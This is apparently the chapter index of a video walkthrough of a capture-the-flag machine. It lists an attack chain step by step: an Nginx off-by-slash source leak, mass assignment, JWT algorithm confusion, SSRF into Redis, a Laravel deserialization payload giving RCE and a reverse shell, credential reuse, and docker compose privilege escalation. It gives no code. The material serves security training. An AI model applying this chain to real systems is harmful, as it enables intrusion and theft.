00:00 - Introduction
00:55 - Start of nmap, playing with the webapp discovering it is Laravel PHP App
06:50 - Discovering /assets is a redirect to /assets/, indicator of the Nginx off by slash [MasterRecon]
11:50 - Using the Nginx off by slash to download .env and .git to get the source code to the app
14:00 - Start of code analysis
15:55 - Finding a Mass Assignment vulnerability in the update functionality
21:50 - Taking some time to explore if there are ways to find Mass Assignment without looking at the code or guessing
27:30 - Looking at the Webhooks-api-beta website, playing with the request and discovering we need to send it JSON
30:40 - Playing with the JWT, Discovering its a RS256 encoded, doing an Algorithm Confusion attack to sign the token with the RSA Public Key
41:50 - Playing with the Webhook and discovering a SSRF, which we can also do protocol smuggling since we can write to the HTTP Method
46:30 - Looking at the Redis Migrate functionality which confirms we can interact with Redis. Also stand up redis on our box with docker
52:28 - Inserting a poisoned laravel cookie into redis we created with phpggc, troubleshooting all the encoding issues we have. Browsing the page deserializes our cookie and gets RCE
1:17:50 - Reverse shell returned, examining the mysql database and redis keys
1:30:10 - Uploading a static nmap to scan the docker containers finding a docker registry, downloading the api container to get the source code
1:49:35 - Source code analysis on the webhook code, discovering a file disclosure and hardcoded API Key
2:02:50 - Dumping the environment variables, getting the DB Password which is also a user password, ssh as john
2:08:30 - John can run docker compose on a sanitized docker file, there are a few ways to bypass this check
2:12:10 - Showing we can pass in a raw device, which works without adding any special capabilities to the docker container but it is very very dangerous
2:30:30 - Showing we can also pass in a volume as RO and give the capability and AppArmor policy to allow the container to remount this as RW
Support the originator by clicking the read the rest link below.
